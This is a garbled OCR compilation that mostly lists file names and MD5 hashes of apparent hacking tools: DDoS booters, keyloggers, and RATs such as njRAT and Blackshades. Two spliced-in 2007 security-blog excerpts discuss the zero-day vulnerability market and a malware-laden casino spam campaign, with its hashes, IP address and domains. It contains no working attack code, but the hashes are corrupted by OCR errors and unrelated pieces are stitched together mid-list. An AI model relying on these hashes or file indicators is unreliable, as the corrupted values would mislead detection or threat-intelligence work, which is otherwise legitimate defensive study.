ed2d9ac71a3b1fd52877d43bfec87aca 
turbo.png 
e8b3ac5debf7542e40526aedcb02f90a 
turbo2.png 
fa31b0cf31b92be8700f0c8c4059ae03 
DUTCH FREEDOM.txt 
bf52ede817b83d7d35eca8ffe5bfcdle 
DutchFreedom.hoic 
8545406e9887fff9b7d23bd8d1ba827a 
GenericBoost.hoic 
117dcd32592d6785a55c9ceac79bd557 
HOIC DOCUMENTATION FOR HACKERS.txt 
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cllfdac966d5923ce44a6aal107bd3d82 
hoic.rdp.rbp 
ec16992ad983106a7a3c6d4c78914425 
hoic2.1.exe 
65c754f45e42cc434dc12940ace2827d 
user-agent-test.hoic 
bc3480db06614b5e56376559d4138c8e 

visa _stress.hoic 
4715a3d5e2323168c4afeb3637fc127b 
buttons.rar 
7d7495cdeb9b52f12d32460027782d0d 
4add.png 062587a5eb25732f2dc466abal26a21c 
6266.png d899f1c4072365d42dd6eacbdf8d9280 
666.png 

59ff8d3a3539122b35142116a3a8a0ac 
6666.png b63b5663149586f34127fd3c47d26cca 
add.png 

8ade13213352f64d34e561d2e0a0f454 
add2.png d98f80edfa546f413106fac5b1de9877 
add3.png ae39f32971ba9b649e1e817c2cf6les8e 
button - Copy.png 
3e759alfdc0a9cb94239284af36ae651 
button.png 
3e759alfdc0a9cb94239284af36ae651 
button3.png 
37¢9854daf077cd50a91e4bf0dd320bf 
button4.png 
01dcd72ab51e145129ec54cae7cbfle5 
button5y.png 
01dcd72ab51e145129ec54cae7cbfle5 

lazer.png 

5dfc0a47f6309048ae3a68208685c3b8 
remo4ve.png 
1d1172a772171f24b0615e59442bd329 
remove.png 
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Oefffla2c8d7d86cee7b9963a7662a20 
removeqw.png 
ffab67111f3d2ab27a9ae03c37b36edb 
scripts.png 
ed2d9ac71a3b1fd52877d43bfec87aca 
turbo.png 
e8b3ac5debf7542e40526aedcb02f90a 
turbo2.png 
fa31b0cf31b92be8700f0c8c4059ae03 


HostBooter v5.5 Fixed Crack by The Old Warrior.exe 


980bb7a94366c35b575dd3d6bc84fc68 
Server.exe 
637e6dffO8f9be30cc796alca3a03f24 
atk.pyd 
fca75c83a30f77f2c9ee26d48d7cllle 
bz2.pyd 
044ecbca1103ee5f2e1e936195c547cd 
cairo. cairo.pyd 
d953a04606cf92fbdbfdfd344935338d 
DNSAPI.DLL 
f7683ec1225435144f28b611546ba5f2 
gio. gio.pyd 
0eb5009486bd5ba2df57ba60c1298f86 
glib. glib.pyd 
b9de97fea58cbf68alca0c42e8456541 
gobject. _gobject.pyd 
c67a225b49b1ab160082dacledd2903e 
gtk. _gtk.pyd 
b22fa5bda095ba3f610f177e2e85c3f1 
gui.exe 
a541c7eed6ffe08b03alef350955de20 
http dos _cli.exe 
329909142d5ecda70ba429869e42b3ab 
iconv.dll 
dc02cf8201501ba1l5cb776c7a2f8ceb7 


10811 


interface.glade 
09925e0c52ea122cb749cca83ec27bbe 
intl.dll 9f95ece3d2b3909de4d9147c4d93f976 
libatk-1.0-0.dll 
1f61d69eb4757ff19ca081269c9dc9dd 
libcairo-2.dll 
4c4392b1d548bcd3974a8cbe8686b361 
libexpat-1.dll 
a8f145a27dc339f75916cd81c8760052 
libfontconfig-1.dll 
690ebbf1lfa1lb4505ffff7389b0930ec4 
libfreetype-6.dll 
1b294b7f7a21ea1b04b726528415deaa 
libgdk-win32-2.0-0.dll 
6edbac61ac767705dcal5a65b29ea8fa 
libgdk _pixbuf-2.0-0.dll 
390aa0876b094a858cb960045c98c490 
libgio-2.0-0.dll 
58177dc07e840cc57ca451860288edf7 
libglib-2.0-0.dll 
cef849d6d7476df74a3554ecc59b858e 
libgmodule-2.0-0.dll 
7079eb02f68016e43e0bd6a19ea1429c 
libgobject-2.0-0.dll 
efb9e0e71089fb7001bde8119cbce510 
libgthread-2.0-0.dll 
c9a921a88693ddd5d163d657224d1a01 
libgtk-win32-2.0-0.dll 
86df9814517377e916d255835803d05e 
libpango-1.0-0.dll 
8041c25e8ef512dbc466a086Ff7223886 
libpangocairo-1.0-0.dll 
a906029b3617c07275d3662b508f3b23 
libpangoft2-1.0-0.dll 
c08a50a9b6cal441863cbd29098eeb69 
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4. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware. htm 
5. http: //ddanchev. blogspot .com/2007/09/chinas- cyber-espionage- ambitions .htm 


3.9.27 Zero Day Vulnerabilities Market Model Gone Wrong (2007-09-30 12:20) 


It’s one thing to allow legitimate buyers, presumably the affected vendors themselves to 
[1]bid for a zero day vulnerability discovered within their products in order to provide financial 
incentive for the researcher that discovered the flaw, another to [2]superficially increase the 
monetary value of a zero day vulnerability taking advantage of its vendor-added exclusiveness, 
but entirely another to position responsible disclosure as an exclusive courteousness. Here’s 
[3]a sample letter informing the company within whose products a vulnerability has been 
found, and yes, the ultimatum for not releasing it : 


"We've discovered an attack against the LinkedIn toolbar. If you are interested in the 
bug, we would like to give first right of refusal to purchase it. We’d also like to perform a 
more complete security audit of your products. We can help make the LinkedIn products more 
secure," DeMott stated in e-mail sent to LinkedIn on July 10, as viewed by CNET News.com. 
The e-mail continues: "If you wouldn’t like to buy it then we are happy to resell or release 
as a full disclosure to help prevent security issues arising on end users servers. We strongly 
believe in keeping users safe. We are unique in that we give vendors a first chance at the 
bugs we discover rather than selling to a third-party or releasing publicly. Please find the VDA 
Labs Value add document attached. If you’d like to buy the bug we will provide working attack 
code, so that you can verify the bug, before you send the check." VDA set a deadline of July 
17 and requested a payment of $5,000." 


| first mentioned the possibility of having a security researcher [4]blackmail an affected 
party a long time ago, however, | never thought it would be a company with serious 
knowledge in the field that’s setting ultimatums, doubling the requested amount for the 
vulnerabilities if the vendor delays the response and threatening to release a PoC in a full 
disclosure style. [5]Getting paid for getting hacked in reverse order - getting hacked for not 
paying. However, the ugly reality goes that what’s a zero day for the mainstream media today 
is last month’s zero day for the underground that’s been improving the chances of success of 
their targeted attacks against a specific company or an individual. That’s of course in the rare 
cases when malware authors no longer [6]keep it simple, the stupids. 
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libpbangowin32-1.0-0.dll 
66901644904e59188c53ebfb14288635 
libpixman-1-0.dll 
75cb50d81424ed9a4a0f925377f574f5 
libpng14-14.dll 
d24214e74cb6eaaddb94dd29b3e0859d 
library.zip 
8137bb8593460a920b22109eab36ef5e 
license.txt 
d32239bcb673463ab874e80d47fae504 
MSIMG32.DLL 
2ec53b5a351c4d443896dbad117f7e82 
pango.pyd 
5c7a96948df9b25957bddc857b34d553 
pangocairo.pyd 
7e0f654c8d4408c1d3ffffd2c7b2d91d 
pthreadGC2.dll 
48147f86ed7dd434ccc6f60ff87de686 
python26.dll 
b86a96a4d3fb1fd71cd1b5aal161c0ea8 
pywintypes26.dll 
abc5dcac962ae8aft/af214dd0d6d4ff6 
select.pyd 
035f7619b1f356a62461ca83140847f6 
unicodedata.pyd 
633105082ad9f315c2ac60e9fbdec277 
VERSION 
a3ab4abe7b3546d22fece087cdbee911 
w9xpopen.exe 
8b39b5495afab2fa920468146d369f5d 
win32process.pyd 
5bf6ba38b703df5bbe18358a3188c929 
z.dll 
e515c1ba489a3ab0f9a641435799c389 
atk10.mo c5290f93ae865a88509286b56c185c43 
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glade3.mo 
bc2277d02eb4e4337af0d9eflebea4c2 
glib20.mo 
dc771ba4f2d33b7a04958b527f53a29f 
gtk20-properties.mo 
5a96a91865b8dadad170e870a61758d8 
gtk20.mo ecO8ff40e427ed043ea96e2584083adc 
atk10.mo 2cf8f3395e0397070423c804ec533e6c 
glade3.mo 
dc45a01c5fcdc02041888fc7d8024739 
glib20.mo 
744209ea7f8ac8497fc71ccab4acaca5 
gtk20-properties.mo 
2b786709876ff96e2d6f7dbOféffc7e0 
gtk20.mo 44d97529a9b1fc4b794d75899ad20a2c 
gtkrc 
94d104680cec5f3d8bbec56258d0c926 
Infamous Stresser 2.0.exe 
25190d3916c71683df1a96760984244f 
ddoser.exe 
9222254c57da5ac87cc39c3d93677a58 
INSTRUCTIONS READ ME!.txt 
fc43f32e7649dd799534e97573e32f35 
website ip grabber.exe 
6520d9ab650c992b25c6467324baa2b2 
DevComponents.DotNetBar2.dll 
e5277bc7d04a32074f9e9b645cd80882 
DevComponents.DotNetBar2.xml 
54c686ca426dd7d045f99a55e7d726c6 
Jays Booter.exe 
778cb37b45bed32662c67748edf508ea 
Jays Booter.pdb 
8197a14c1e519f61f0a7da254e499350 
Jays Booter.xml 
3c7d81de601e8606169c9434681e96f8 
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MSWINSCK.OCX 
9484c04258830aa3c2f2a70eb041414c 
MSWINSCK.OCX 
9484c04258830aa3c2f2a70eb041414c 
Be.Windows.Forms.HexBox.dll 
led5fe859aba26b4f8f0afc6341cd62f 
cecil LICENSE.txt 
350a4fe8061517098a67b315b2d43557 
ChangeLog 
69d82553a2abcdc0274d1b0d7911a5ca 
credits.txt 
49287ee23dcb31940a73e755a64852b2 
ICSharpCode.NRefactory.dll 
e56dba60f855b1b1fe8c3dd0cc830ae3 
ICSharpCode.SharpDevelop.Dom.dll 
b194e825dd8d893f6af029cae90f31ad 
ICSharpCode. TextEditor.dll 
2f651edf3947661ed637630b1081ab92 
License _DotNetReflector. rtf 
58c218c11fd6020301463ff5ce080929 
log4net.dll 
5f3bd963f02108c36592b5728fa725c5 
log4net LICENSE.txt 
74ae3e8ad4267784fcal593fcbe3d091 
log4net _NOTICE.txt 
00c0602e7bb66290e5d5848293d865b9 
MIT-LICENSE.txt 
865eccb377ff54b301f53860450b4f64 
Mono.Cecil.dll 
853046ad65ecaae62001c2bb08248919 
Mono.Cecil.Mdb.dll 
494f2c8878b2cf0ca3d1783397d2fldc 
Mono.Cecil.Pdb.dll 
dd286675bf8d977c501a9514edc75c51 
Net-Weave R.exe 
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26e8cb237d43b4b4cal4eec2ed60f614 
README.FIRST.txt 
40de1a83a3ab42e64642ba96c3clfcd2 
readme. rtf 
d02c126d72ec26d8e540dd1e5d863306 
RedGate.Reflector.Addin.dll 
856e34e165380077de54b27f3fdb04d4 
RedGate.Reflector.DevPathSetter.exe 
f542a82e1a197679abd802e9ef539903 
Reflector.exe 
4b305b64e88ca85ad67eb6fe3dc8f80fe 
Reflector.exe.config 
b8b115a63c9368a5ff56f0bead67beb64 
ReflectorCmd.exe 
3e4da95ae0216052e064cfd9f068a792 
Reflexil.CecilStudio.dll 
414f470b37bde9ebc934cac8c5f7b014 
Reflexil.dll 
276670904e8d556d8992a76992feb4d3 
Reflexil.dll.config 

20a0849e85 lalefbfdefc2ad9fc0e63e 
Reflexil.Reflector.dll 
008a3f92b01ba098f1168acclea8b4d2 
System.Data.SQLite.dll 
80725a732aba27911402f9ca09fede23 
XPlugin.dll 
195eb26d43dd473543b2c943dce3f90a 
39dll.dll 
52835d665d00d980eb4b75550dbf3cae 
ProDoS v1.0.exe 
5d6fdc99e6583d7cc7c97b69d7861f54 
Read me.txt 
€2278d2f813b0c16580eade74de99996 
AxInterop.MSWinsockLib.dll 
54efbc05d29b0f107741ed643dcb5c68 
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Interop.MSWinsockLib.dll 
343ec1e971305f4b45e8cb168cb2caac 
Slayers DDoS V2.exe 
1e0a734de2050ad96e2b4d1215ea8b10 
cMd aL - ddoser.exe 
ba234684dd98588cb5492b576bac41d3 
cMd aL - ddoser.exe 
ba234684dd98588cb5492b576bac41d3 
Multiple CmSSite FlooDDoS.txt 
b593e61c96beda6b419c33d3193e04a4 
Readme.chm 
c9b2db0c6afel37f15c8fe534505a285 
sprut.ini 
d998dd4cf4613517630ca63f5a88891c 
Multiple CmSSite FlooDDoS.txt 
b593e61c96beda6b419c33d3193e04a4 
Readme.chm 
c9b2db0c6afel37f15c8fe534505a285 
sprut.ini 
d998dd4cf4613517630ca63f5a88891c 
TeVDos.exe 
94ecd2db28320bcc800e5el1e96b0fdf1 
TevAttack.class 
2alc55afee03257d42e09938fa96816c 
TevDos.class 
e52a36ca84898f3388a4d3e96d3e22f1 
readme.txt 
be8125b099b4ee86f659cfef04b63alb 
UDP Unicorn.exe 
26a781f1b4d7a9ba041a4dalcf90e2c7 
config. ini 
Ob8d0feb3083a640849e6c49b129f4eb 
music.mp3 
dc5a7eb6bd42de84d271064f8dce3136 


ac.C 
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5f8cc2e104431c32b971aeeb31d0c223 
ac.h 
11a8025bb692f373dfal9faea2e77f93 
config.c 7a9b1ffl0e8al04d425c6e72c69a72e5 
config.h 02c6dd430244dd320f73b2786aacf7e6 
GNU General Public License.txt 
52b22f4a0358441eb5d028d7c6b93787 
main.c 
7dfd03f966b12545ba244085f8c601db 
music.c 
1c6417cec85f38710dc82bcc17b7e698 
music.h 

739aabbdfdff7 6f2a06ba8db2d0f5b12 
netinfo.c 
9b70286f1c5eb27349b775ac131897e6 
netinfo.h 
80ff7115d89b847cf983feal6b7991ed 
ps.c 
4d6314576fd453f5855f4a8a801a4a25 
ps.h 
17120c2673579fdb88ffdb8b376382a5 
resource.h 
62fb22015fa998225df284d23b6eb41a 
resource.rc 
dc77db09961c162226c0248dae93d8f5 
udpunicorn.c 
09362cfb987010130ff641852ca7fa06 
UDPUnicorn.exe.manifest 
f2eb83fa0d8223f29eabb0a38f029cee 
udpunicorn.h 
7722d3bf721d3b3de6538f90e8cabeac 
UDPUnicorn2.0.cbp 
67e1d158158edf1515d95a459cfea289 
attacking.ico 
fd085eead12c8aal1f303318b4654a613 
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idle.ico e12a30ca6cc8b35395af755880dc8746 
mainicon.ico 
86e05a25555e37cf590a552e52fee462 
music.ico 
€3f842be9699212f486fd8d0429652bc 
Command line.txt 
a6f261005fb97cc341ef83466c8f9a10 
Unknown DoSer release.exe 
4f3782e2f6f8daeeb7cf7957d60b8044 
novo-dangos-001.ico 
a3d8982a5337f59aele92afb925a949e 
xDDoSeR Bot Builder.exe 
52053b327d2b1ae37f27cd646fdfd0a9 
xDDoSeR.exe 
d4fe7991552fcb407c68c7813cf6d847 
Anonymous Keylogger.exe 
70f7fdd57cd561a114ac03e1f50649fe 
Dracula Logger.exe 
f51a2895a0aee4f6290de37ac8a2042f 
PoisonLogger.exe 
e€2992b7e2f2be8249e85d4e617f1e939 
DevComponents.DotNetBar2.dll 
d068ce38f5f9caedle63ffo1169ede92 
Project Neptune v2.0.exe 
e044f33cfd266e5c873314c9099e4150 
Syslogger Builder.exe 
4c7f0fe2ce333777386b95ed0c2a8304 
stub.exe d761f74f1f86432d461a548f026f4b89 
UltimageLogger by exe.exe 
b6748b36d4060377072e758a0f560457 
Credits.txt 
353523394fac306b6269ece9d795aaal 
Dissembler Lib.dll 
4127d00b294f09835929297a6cc8fa79 
Read Me.txt 
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2eea9139f4640533892748ed44b9e445 
Unknown Logger Public V 1.5.exe 
6d52e531d7dacdc27a83183b110f0097 
Auto Clicker.exe 
bafef91d4721ac3a0b1d7d2b7d104652 
Auto Clicker.pdb 
2a94586c75cf2cb00229980a7308e42e 
Auto Clicker.xml 
8b97e542dd0d446e5cbd2ec946fd4b5b 
Eternals Auto Typer.exe 
d6003407c218079ffae71982e69236af 
Eternals Auto Typer.pdb 
a7d1lcb2cab7ac9fa57c087f1145fb076 
Eternals Auto Typer.xml 
31ee62912a427e08641b91387e5c8661 
Eternals Extension Spoofer.exe 
7676637914ed508b751a0e27495906a 
Eternals Extension Spoofer.pdb 
15207d00f7d5a56704680534f4e92d8e 
Eternals Extension Spoofer.xml 
343e4f0f71c9dfa8f83589d005b4e929 
Eternals Site IP Grabber.exe 
bc0415abcb1le61fc5c51204ac2f20e4d 
Eternals Site IP Grabber.pdb 
4f775f3427cca83a580bf7774315a4fa 
Eternals Site IP Grabber.xml 
8f3350ecd9ab6f41a69fa95d8f049cd3F 
Eternals WebBrowser.exe 
270cc2af2a427709e3dc6600ab571cd6 
Eternals WebBrowser.pdb 
9514b966143968c33c3193aa225f749F 
Eternals WebBrowser.xml 
5fb35c019e4c434b4cO0af716dledf09d 
UDP Flood Pack v1.exe 
374bd5857faed76b4f2d52b3a0e31b6c 
10820 


UDP Flood Pack v1.pdb 
ad336f17776904424e1a6b907222f1fc 
UDP Flood Pack v1.xml 
e€253b2f2259dd9f8dddfcc686b34df89 
UDP Flooder.exe 
30cae260837144b02144cb6b666bf552 
UDP Flooder.pdb 
eebf46f0383637a8ad71b4c5b8d12954 
UDP Flooder.xml 
Of0b7ec83298df88fffd396dd7dcb4a2 
Proxi.txt 
837d4b4e537b7e93baa061a96f03ef20 
njRAT.exe 
d913ce14475df9e16e4c506e9025d6f2 
Spy-iNet.exe 
701833e08c204be64de0c48dd22db39f 


Tiny.exe 443bea7ce6882a39b9ca3c89ed5f30b1 


Blackshades NET Setup Tutorial. pdf 
5b73cc2ba69f315230844ecae78b3c4e 
Blackshades NET User Guide.pdf 
7753e25cclafalbebce1d9264b17e098 
client.ini 
3601ledfb2b6237d0fd9783ae879e139b 


HWID.exe 44fefl1ca8263ec8ff2879d492d8fb4c 


Purchase Full Version.txt 
de75a862ef718632827eab641447c021 
Read Me.txt 
66941bff8fecac650dfe1l5e123c91f8f 
Codejock.Controls.Unicode.v12.0.2.0cx 
ec08be364fd4ec034597200c42c04b0a 
Codejock.SkinFramework.v12.0.2.0cx 
d6901189ab414fea205efcfde159b021 
CODEJO 1.oca 
928ab3d2ffe0944b9dd8bd648d7042e5 
CODEJO 2.0ca 
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25f7cc50f4bbf81ff82c243f20cde0c7 
data.ini 55bbb63ea440100d124e8cf2a167e99f 
IPList.dat 
O06ff3d8a37ff4517ae89e5b156f21563 
MSCOMCTL.oca 
6812745a19da4ca5d019813048fce3b7 
MSCOMCTL.OCX 
774a15583db1ad44c5ee32309c840c96 
MSDATGRD.oca 
5f4f22ce7fa9761538120c71bcb3dd6d 
MSDATGRD.OCX 
fa8de5f76ba59bc4190fde2c78401d40 
MSINET.oca 
21362dbc13344ad0b047a505a9585303 
MSINET.OCX 
7bec181a21753498b6bd001c42a42722 
mswinsck.oca 
39205aaba3a134e902f09933b3dc7fcl 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbf1l38aaac2daeac73cb56f1e00 
RICHTX32.0ca 
eca371853447cf031acc3a209e039b7b 
RICHTX32.0CX 
eb4a8f35a70a887fe32f43a3aa7d4e9a 
upx.exe 
92b1c17c81234d3d651f68cd615ef8d6 
L.gif 
683f5e1bcc3a92410c980983b10d13cc 
10.gif 
4a7b2912f159062c30a50347d181fe70 
100.gif 
6c446f42ec0da49fd10c839ba20e2e63 
101.gif 
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Here’s [7]another article on this story. Image courtesy of [8]eEye’s Zero Day Tracker. 


http: //ddanchev. blogspot .com/2007/07/zero-day-vulnerabilities-auction.htm 


http: //ddanchev.blogspot .com/2007/01/zero-day-vulnerabilities-cash-bubble.htm 


| 
. http: //ddanchev. blogspot . com/2006/03/wheres-my-Oday-please . htm] 
http: //ddanchev.blogspot .com/2006/03/getting-paid-for-getting-hacked_17.htm 
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3.9.28 Don’t Play Poker on an Infected Table (2007-09-30 18:58) 


EURO VIP CASINO 


$400 
Nelcome Bonus 


DOWNLOAD 


eseo 


The scammy [1]Euro VIP Casino is making another round this afternoon and trying to entice 
the spammed European users into downloading its software by promising $400 as a welcome 
bonus. Needless to say you ought to ignore it. Here’s a [2]full list of the [3]typosquatted 
domains serving the scams. 


Detection rate : Result: 11/32 (34.38 %) 

File size: 461341 bytes 

MD5: e68763c16f31de340681b2c7c7eb6b0e 

SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9 


[4]Online gambling is a buzz Internet activity allowing malicious parties to enjoy the 
"pull effect" by end users who themselves look for and download such applications. In this 
spamming campaign, however, we have a combination of a "push" approach, segmentation 
targeting European users, social engineering in the form of a promotion, and typosquatting. 
The first campaign (SetupCasino.exe) is currently hosted in China (116.199.136.29) on a host 
managing a second online gambling scam campaign impersonating [5]Golden Gate Casino 
(SmartDownload.exe) under the following domains topgamecasino.net; superroyalcasino.com; 
nlymycasino.cn; lookforcasino.cn 


1. http://www. jamesmiller.com/mtmblog/2006/12/euro-vip-casino.html 


2. http://www.mooload.com/new/file.php?file=file01/300907/1191171072/euro-vip-casino.txt&s=t 
3. http://195.210.38.41:2082/fi1le01/300907/1191171072/euro-vip-casino.txt 
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c3741a13c68e380bb05d41e6b29feae9d 


102.gif 
da6f0195c6594cb088b09e7b07420945 
103.gif 
f69713c9c4ac1460a155517c8f2e8b70 
104. gif 
2f1ad5a7035f3bc92178f7d15a9affed 
105.gif 
d46190d6139ee5e4222194af3d642188 
106. gif 
72a821068409fd0ea796b67355982d99 
107.gif 
al1412bbb7e48e1c195e64aadde8328fb 
108. gif 
84189a1b08c5f722be99b16da84d9786 
109. gif 
d6363bfd8f230130db77elecf99417e4 
11.gif 
bbbf223861d1bd48a09229562db61276 
110. gif 
fo1a8d4a6e3159d57a47d1aa5a569e06 
111.gif 
9d39fb34bc9519bd8f2d90a9151839fc 
112.gif 
a66f7313717368e657ald5a29deafcde 
113.gif 
ea03aeceeb97a268f22a907af5483edf 
114.gif 
f99c5607b0589cdfa64a602d0c185662 
115.gif 
a3afd015d3081ed7bcd09bda2e6b9631 
116.gif 
84be4b9b650a29af4al1196a16049130c 
117.gif 


ee0538cled0a23e838b1lcae4ccdf67ad 
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118.gif 
Sefaf3cf2ca0c5fo5fe889c7974e246b 


119.gif 
adOfadf4bf7595606d0b1ff596790b10 
12.gif 
afd00e1432935d39c6fcbbe4a75afb1d 
120.gif 
41e20f0b1984a737cc3eld5a7af485dd 
121.gif 
a29e28c42e6936c160b2bdb7d7cc1a26 
122.gif 
ca051f77d62b0e161f41f580f3d94387 
123.gif 
fbee49d578ccac891lecb3f9d7924fea7 
124.gif 
40e25159bd20b6cfd04b9147feb948fc 
125.gif 
a3c2e7ef8bf259459c98310737d6f73e 
126.gif 
a938bead58df6e461f5b8e8aca7fd86Ff 
127.gif 
776a8a1522b9ef3a7da856ce9199f072 
128.gif 
170d7061lad5c3f7d9e20ece655c0lae7 
129.gif 
798b0d92a697e1c3f6ab72e16b73f3d3 
13.gif 
2allcaaa66debd78a982b14ef5190371 
130.gif 
91936df2211679277b0b6484636fd922 
131.gif 
073da4142dcd4fe021b42b39e6522ca5 
132.gif 
bcd450500a9cc0a755ad74aa47347ac6 
133.gif 
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011e0c12782613458eff8f272b0a69a2 


134. gif 
92b294a8079db7b0633c8dc991abf8c3 
135.gif 
6c4892982fded2195f45b9ce3dc909b7 
136.gif 
57a862cc48674b6d78313a708314b1e9 
137.gif 
2285cebac842ed75edc950a69dddd48e 
138.gif 
822efc8a5921a6ca281ef1405fd4a303 
139. gif 
aal6ccd82f0302b2d7d5fd798f501759 
14. gif 
f5c96a8b759141c514798d6e7bla2cle 
140. gif 
6bdef28690e84b0667ebac75b6535319 
141.gif 
94f4alecf4095adbacc8cb69222394bf 
142.gif 
f45453308e7d319falfac4b517860185 
143. gif 
d19bee38077187409df3c6defb2ed7c1 
144. gif 
486939a940cf9546207fd9cab1lec028 
145.gif 
e€078d3c54770b77ce14075bdea7a2c65 
146. gif 
fe0a52298daa007dcbf07bf2ac3a4ebe 
147.gif 
496150a2f7e732bddfb9db27c6ac86b1 
148.gif 
3adf35995fade25bf2270eae18a20b31 
149. gif 


8ddfffb865ed49147610a9d72becf645 
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13.git 
c1695alac94ee817cc3c6f5b0eabb8a3 


150.gif 
ac295725695e2f4216e60f983916785c 
151.gif 
54784ff863c5103f577e5d40689f857d 
152.gif 
b87flcc3ladcf84dd9b1a29933615d42 
153.gif 
2bfb51d2dd268fe670204f3ca799294F 
154.gif 
06b21cea1408429699844675ff6cf4f4 
155.gif 
4c3fcf6b87b2971e57a0bc29f29d9c9f 
156.gif 
fc8be017b7be2b1097b53362c05433fd 
157.gif 
5f9a1c9474fe8b0d73cd8c7e8a654502 
158.gif 
917420325a2125019133646ce5da3996 
159.gif 
3a33clae7160e3414cf57cef922f0b7a 
16.gif 
7a83ad25cc22054dc45db94922a028d3 
160.gif 
c1f68d3530b23d6c7efb6c25beac30e5 
161.gif 
d4e88c3a9ac6bf6debf6615037fa83bc 
162.gif 
01ce4368b0c04b7dd13d2e39e9654b12 
163.gif 
51c4b742afe0f210c9e2f8a8dc2417f5 
164.gif 
e57171a597cd1860c061d5dcc5ca5f94 
165.gif 
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943d1544c63ea24a7a9fa563e394e8F8 


166.gif 
760545a0e29d6939fd66e5de816c48aa 
167.gif 
68aa6c275d0e70c9c7dbac7a32600926 
168.gif 
003bdf03cfce865c94d486418004ae2d 
169. gif 
7ebd99c5fde9alf3a4d0f9690fObF9I69 
17.gif 

c2c0e4c3e93a7 7fa519c9f2da280f072 
170. gif 
bc398c1f9f9063d79a09eef6303F2249 
171.gif 
2152321a43f036b174344944ab018bf7 
172.gif 
2294f61d08796bdf7ba6a3701bb2ede8 
173.gif 
f17f549f8aa8285dd77e8f21c65bdca6 
174.gif 
a9d6fa6d6c7ffd1f334bbe7615c06778 
175.gif 
52a80bc55141c14f6ee0fe691d6d4f10 
176.gif 
b1b2d78727fea095b474045d0d3ac4b2 
177.gif 
ff3feOd5ad0faa04edf6dbd2c6fa071c 
178. gif 
b3e88c83c500f792bdafel9alf96b4f4 
179. gif 
a08c4af6f90264f6a1157574e1f047e2 
18.gif 
€858ab7239b8015a83f5f897 6ffcf34b 
180. gif 


8b13bfa55cba7da3fb081e23c8234b2b 
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181.gif 
299ba9f3ff06d5035585a831506ba7d7 
182.gif 
5e511ded1b09d5bade754adc257365a2 
183.gif 
3ffed0774932b3c5041ladbc9elb2ec36 
184.gif 
5fla8f7966df53a5c7f5ff15c7152e4a 
185.gif 
838c5dc7446ec7bb03bbe4890b4f89ce 
186.gif 
afdbc5a8d816fa992f84d802bda62516 
187.gif 
964b1b05eb711efc321da8360a602a00 
188.gif 
638b2c41113e5edb218f687f814845bd 
189.gif 
€64429e4c56967ec0845f26ff92ca0c5 
19.gif 
6c526de7f2c479393bd95a0ee3f55b6b 
190.gif 
0f660689bdd44d5d94e4a95f6efb28e1 
191.gif 
ddf9dde996532c403679e9111f93afb6 
192.gif 
cdb02ebe150ac16254bd1dca6ba91fdf 
193.gif 
58b51e29c2633fbdf2f606dea51544d0 
194.gif 
c2bad1fea70127ed5acd4d8176c65el1b 
195.gif 
43f3005242faf3d8f666817d4dee7adf 
196.gif 
da69f9e5639afd2209a8f68eb055211a 
197.gif 
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a370b2268fa2b5daa752bff6a90c818c 


198. gif 
3a58dac9e942eb63c3ellae9eca02215 
199. gif 
a9fe96ef930760e5240c7ff219c25cac 
2.gif 
7baa4d8ae6727497c7ba02570d812656 
20.gif 
a787flllec85b9cc9e1lc60d55fcffcd1 
200.gif 
dde91b09b11ddc00817c873fb8f125a5 
201.gif 
7487e1f30f5aff072116e64eflda8b0e 
202.gif 
038e6a6849d6df2731704d697d44f0f1 
203.gif 
98b14b496ad57f08ed310f16bcO0da6b4 
204.gif 
c1f68d3530b23d6c7efb6c25beac30e5 
205.gif 
7¢cd885c46477cbc0e2e9122787fd77b3 
206.gif 
bdeed604086b1ee8b5129802c3770049 
207.jpg 
3930e8dfe8804ab4a6edebadd802cal6 
208.gif 
3¢337240892c0b59f6524c0580d5b630 
209.gif 
8fec4d24eb3d71e0377c3912eed33822 
21.gif 
88bd2077127169fa0d7cd77a38b4388c 
210.gif 
f92865ae021d63e98249b5745522f033 
211.gif 


539a448d9574c901lafec3f121bd2be09 
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212.gif 
c2601a065ac808e9fd25b2f3e4519dc9 
213.gif 
c5laaf546fc83d603adb4b0d23a88429 
214.gif 
87fe09d5f56d11672aa8b01ff60dea25 
215.gif 
bb44946aef5cea20f727cd33d25b2db5 
216.gif 
5fa13370878c968bb40c061b0406da98 
217.gif 
5alf0e9bd3ad9ecec55fd90bfd5cc8e9 
218.gif 
92492e08fd6c1lcac231dbebd52b28427 
219.gif 
4c62eadb516e9d3f96b2c97f3e315570 
22.gif 
c673c12cea111092270cd20flde19c7c 
220.gif 
e6aa6lfefdl3aa5dcb15eb85d892af53 
221.gif 
f85abc007f66f242c7a32571da1645e9 
222.gif 
b7cb5f65f819c0a279229f0aba85aac4 
223.gif 
38d0f9e2e37b2924f58a520b8b139d39 
224.gif 
158710c512e2f3293a3958dabecf6694 
225.gif 
3a8d5fe5cfd6bcfc71f4a983d2ffeafa 
226.gif 
be2b04acd7f6e5efbodd75cbb1ba99296 
227.gif 
4c5bd3175f51bd00e39fdf9c7ddaae0d 
228.gif 
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31b966a32f2b101d5c7el569f6fab69a 
229.gif 
018f3cbb96f02e4308e48c2cfde98615 
23.gif 
7b0f919ed90e293a955d2cb8a970799b 
230.gif 
ead183bbb05b07dda78caf94b0d84298 
231.gif 
c20159165fd9b5e7731a4b1218b560ac 
232.gif 
485ee68dce279a4cb74ed52819e362e0 
233.gif 
39efc9d30fd72f6e3322b89b87d9ef8F 
234.gif 
1a30b3eleb7a98eb6fd7429baa9e87 fcc 
235.gif 
4fa6769debda7e102bfa11394d19400f 
236.gif 
62deec040ca94808da1a406d18a7267a 
237.gif 
f0783621b317e7670bec81a74fa4d15c 
238.gif 
953c4265af7b272d4bbeb95e2e1021e4 
239.gif 
0b466e805c51d162996753e0f1f161ba 
24.gif 
4c91e67514cf40d56afl17e5bfb3e8b4c 
240.gif 
577fa58d01baf03868456b3fc79c52d3 
241.gif 
€163322c4a28abfb3e54014fa4c0093a 
25.gif 
5a8bed11d786ae1e443613f86ee0843c 
26.gif 
7139f1dd968a309f4734e9609ca861d2 
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27.gif 
b7df451e5c56c3c466c769db9113a4fd 
28.gif 
d690a313f8929a4220a9dd5f7cbf3f35 
29.gif 
44a716fcd52139d9ee883e1627ec8c22 
3.gif 
af803d2cc510917a859538e9cf9b2c90 
30.gif 
d4559adb84487fb7f66a2d111f059576 
31.gif 
9ebb31eb9bd1bdca833097f9c4bca7a5 
32.gif 
f52e8c2b3dc0efdf457c93a1a04276ec 
33.gif 
1d97c8668a59c4bae222a130ce41d95e 
34. gif 
